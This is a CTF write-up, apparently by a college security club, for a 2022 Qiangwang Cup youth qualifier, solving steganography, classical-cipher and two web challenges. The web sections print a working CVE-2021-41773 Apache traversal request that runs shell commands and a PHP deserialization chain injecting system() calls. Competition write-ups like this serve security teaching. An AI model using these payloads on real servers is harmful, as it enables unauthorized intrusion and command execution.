2022强网杯青少年组选拔赛WP
misc
misc1
你知道万能和弦是什么吗?
解压得到base64
解base64发现是2位一组倒序的png
fr = open('chuyinweilai.png','r').read()
fr = base64.b64decode(fr)
png = b''
for i in range(0,len(fr),2):
png += fr[i:i+2][::-1]
fw = open('resa.png','wb')
fw.write(png)
fw.close()
写脚本导出PNG
![2022强网杯青少年组选拔赛WP]( "2022强网杯青少年组选拔赛WP")
搜索音乐的财富密码
带密码的png
用 cloacked-pixel
python lsb.py extract res.png 11.txt 4536251
flag{5cc0aa21208b517dbd0bde650247237f}
misc3
隐写术是一门关于信息隐藏的技巧与科学,隐写的信息看起来像一些其他的东西,隐写不同于加密,加密是一段你看不懂的东西,隐写是一段你似乎能看懂的东西。现在,这里用了一种最简单的隐写方式隐藏了一些信息,你能找到它么?
一个png
010 查看实际为jpg 文件尾一个zip和一句话
zip解压得到一个png
带密码的secret.png 还是经典cloacked-pixel
python2 lsb.py extract secret.png 3.txt 7his_1s_p4s5w0rd
flag{2e55f884-ef01-4654-87b1-cc3111800085}
crypto
crypto1
没有规则的乱文,该怎么进行分析呢?
一堆A和B 有换行和空格 猜测为Morse
把B换成. A换成-
BKJOGDTKFOEJ PV GEX OKFBGPBX FSM VGRMJ DI GXBESPZRXV IDK VXBRKX BDHHRSPBFGPDS PS GEX OKXVXSBX DI FMCXKVFKPFW QXEFCPDK, NEPBE PV MPCPMXM PSGD BWFVVPBFW BKJOGDTKFOEJ FSM HDMXKS BKJOGDTKFOEJ. GEX HFPS BWFVVPBFW BPOEXK GJOXV FKX GKFSVODVPGPDS BPOEXKV, NEPBE KXFKKFSTX GEX DKMXK DI WXGGXKV PS F HXVVFTX. FS XFKWJ VRQVGPGRGPDS BPOEXK NFV GEX BFXVFK BPOEXK, PS NEPBE XFBE WXGGXK PS GEX OWFPSGXYG NFV KXOWFBXM QJ F WXGGXK VDHX IPYXM SRHQXK DI ODVPGPDSV IRKGEXK MDNS GEX FWOEFQXG. VPSBX GEX MXCXWDOHXSG DI KDGDK BPOEXK HFBEPSXV PS NDKWM NFK P FSM GEX FMCXSG DI BDHORGXKV PS NDKWM NFK PP, BKJOGDTKFOEJ HXGEDMV EFCX QXBDHX PSBKXFVPSTWJ BDHOWXY FSM PGV FOOWPBFGPDSV HDKX CFKPXM. HDMXKS BKJOGDTKFOEJ PV EXFCPWJ QFVXM DS HFGEXHFGPBFW GEXDKJ FSM BDHORGXK VBPXSBX OKFBGPBX; BKJOGDTKFOEPB FWTDKPGEHV FKX MXVPTSXM FKDRSM BDHORGFGPDSFW EFKMSXVV FVVRHOGPDSV. GEX TKDNGE DI BKJOGDTKFOEPB GXBESDWDTJ EFV KFPVXM F SRHQXK DI WXTFW PVVRXV PS GEX PSIDKHFGPDS FTX. BKJOGDTKFOEJ'V ODGXSGPFW IDK RVX FV F GDDW IDK XVOPDSFTX FSM VXMPGPDS EFV WXM HFSJ TDCXKSHXSGV GD BWFVVPIJ PG FV F NXFODS FSM GD WPHPG DK XCXS OKDEPQPG PGV RVX FSM XYODKG. PS VDHX ARKPVMPBGPDSV NEXKX GEX RVX DI BKJOGDTKFOEJ PV WXTFW, WFNV OXKHPG PSCXVGPTFGDKV GD BDHOXW GEX MPVBWDVRKX DI XSBKJOGPDS LXJV IDK MDBRHXSGV KXWXCFSG GD FS PSCXVGPTFGPDS. BKJOGDTKFOEJ FWVD OWFJV F HFADK KDWX PS MPTPGFW KPTEGV HFSFTXHXSG FSM BDOJKPTEG PSIKPSTXHXSG MPVORGXV PS KXTFKM GD MPTPGFW HXMPF.GEX IWFT PV 1M817I23-4X20-9405-QI6M-X83M055316M6, OWXFVX FMM IWFT VGKPST FSM QKFBXV JDRKVXWI, FSM FWW WXGGXKV FKX WDNXKBFVX.
使用quipqiup对单表替换密码进行字母统计学频率分析
CRYPTOGRAPHY IS THE PRACTICE AND STUDY OF TECHNIQUES FOR SECURE COMMUNICATION IN THE PRESENCE OF ADVERSARIAL BEHAVIOR, WHICH IS DIVIDED INTO CLASSICAL CRYPTOGRAPHY AND MODERN CRYPTOGRAPHY. THE MAIN CLASSICAL CIPHER TYPES ARE TRANSPOSITION CIPHERS, WHICH REARRANGE THE ORDER OF LETTERS IN A MESSAGE. AN EARLY SUBSTITUTION CIPHER WAS THE CAESAR CIPHER, IN WHICH EACH LETTER IN THE PLAINTEXT WAS REPLACED BY A LETTER SOME FIXED NUMBER OF POSITIONS FURTHER DOWN THE ALPHABET. SINCE THE DEVELOPMENT OF ROTOR CIPHER MACHINES IN WORLD WAR I AND THE ADVENT OF COMPUTERS IN WORLD WAR II, CRYPTOGRAPHY METHODS HAVE BECOME INCREASINGLY COMPLEX AND ITS APPLICATIONS MORE VARIED. MODERN CRYPTOGRAPHY IS HEAVILY BASED ON MATHEMATICAL THEORY AND COMPUTER SCIENCE PRACTICE; CRYPTOGRAPHIC ALGORITHMS ARE DESIGNED AROUND COMPUTATIONAL HARDNESS ASSUMPTIONS. THE GROWTH OF CRYPTOGRAPHIC TECHNOLOGY HAS RAISED A NUMBER OF LEGAL ISSUES IN THE INFORMATION AGE. CRYPTOGRAPHY'S POTENTIAL FOR USE AS A TOOL FOR ESPIONAGE AND SEDITION HAS LED MANY GOVERNMENTS TO CLASSIFY IT AS A WEAPON AND TO LIMIT OR EVEN PROHIBIT ITS USE AND EXPORT. IN SOME JURISDICTIONS WHERE THE USE OF CRYPTOGRAPHY IS LEGAL, LAWS PERMIT INVESTIGATORS TO COMPEL THE DISCLOSURE OF ENCRYPTION KEYS FOR DOCUMENTS RELEVANT TO AN INVESTIGATION. CRYPTOGRAPHY ALSO PLAYS A MAJOR ROLE IN DIGITAL RIGHTS MANAGEMENT AND COPYRIGHT INFRINGEMENT DISPUTES IN REGARD TO DIGITAL MEDIA.THE FLAG IS 1D817F23-4E20-9405-BF6D-E83D055316D6, PLEASE ADD FLAG STRING AND BRACES YOURSELF, AND ALL LETTERS ARE LOWERCASE.
THE FLAG IS 1D817F23-4E20-9405-BF6D-E83D055316D6, PLEASE ADD FLAG STRING AND BRACES YOURSELF, AND ALL LETTERS ARE LOWERCASE.
标志为 1D817F23-4E20-9405-BF6D-E83D055316D6,请自行添加标志字符串和大括号,所有字母均为小写。
flag{1d817f23-4e20-9405-bf6d-e83d055316d6}
crypto2
破解信息(最后的字符串为flag{uuid}形式)
解N形栅栏密码,32栏
FLAG[vxpsDqCElwwoClsoColwpuvlqFvvFrpopBss]
rot爆破 发现位移31和32有想要的东西
Amount = 31: ek`fz7914c2bd-880b-40b0-8167-2e77e3101a44|
Amount = 32: flag{8:25d3ce.991c.51c1.9278.3f88f4212b55}
但是把31的填到flag{}里面不对
只改-也不对,最后发现只改数字到32就对了
flag{7914d2ce-880c-40c0-8167-2f77f3101b44}
web
web1
题目内容:存在CVE-2021-41773,你能得到flag吗?
搜索CVE-2021-41773
可以知道是Apache HTTP Server漏洞
进行目录穿越然后提权shell 执行命令
![2022强网杯青少年组选拔赛WP]( "2022强网杯青少年组选拔赛WP")
GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: 101.200.76.17:34199
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 14
echo;cat /flag
flag{3e08776b-ae03-4c14-9955-684eb744897e}
web3
执行unserialize时会执行__destruct(),在destruct中有preg_match可以触发Range的__toString(),之后会return $this->link->horis;当$this->link是Water是对象时,就相当于返回Water类的horis方法,而这个类中没有horis属性,所以会调用__get(),其中会return $function(); 当$funtion是Circle对象时,类当方法使用会调用__invoke(),从而调用runc的eval方法
<?php
class Water{
public $waterfall;
}
class Circle{
public $daemon;
public $dash;
}
class Range{
public $horis;
public $link;
}
class Sliver{
public $secret;
public $resty;
}
$a=new Sliver();
// echo unserialize($a);
$a->secret =new Range();
$a->secret->link = new Water();
$a->secret->link->waterfall = new Circle();
$a -> secret -> link -> waterfall -> dash = "system('ls');";
echo (serialize($a));
?>
拿到序列化字符串后,由于dash是protect属性,所以要在字符串中加上%00*%00,并且长度+3,最后就是绕过序列化前边的正则,在demo.php前加两个/是parse_url返回结果为false即可
flag{ab753923-7c1e-41c0-bcdb-532ddb6a0693}
比赛结果
![2022强网杯青少年组选拔赛WP]( "2022强网杯青少年组选拔赛WP")
![2022强网杯青少年组选拔赛WP]( "2022强网杯青少年组选拔赛WP")
网络安全社团公众号
微信号 : qlnu_ctf
新浪微博:齐鲁师范学院网络安全社团
原文始发于微信公众号(齐鲁师院网络安全社团):2022强网杯青少年组选拔赛WP
评论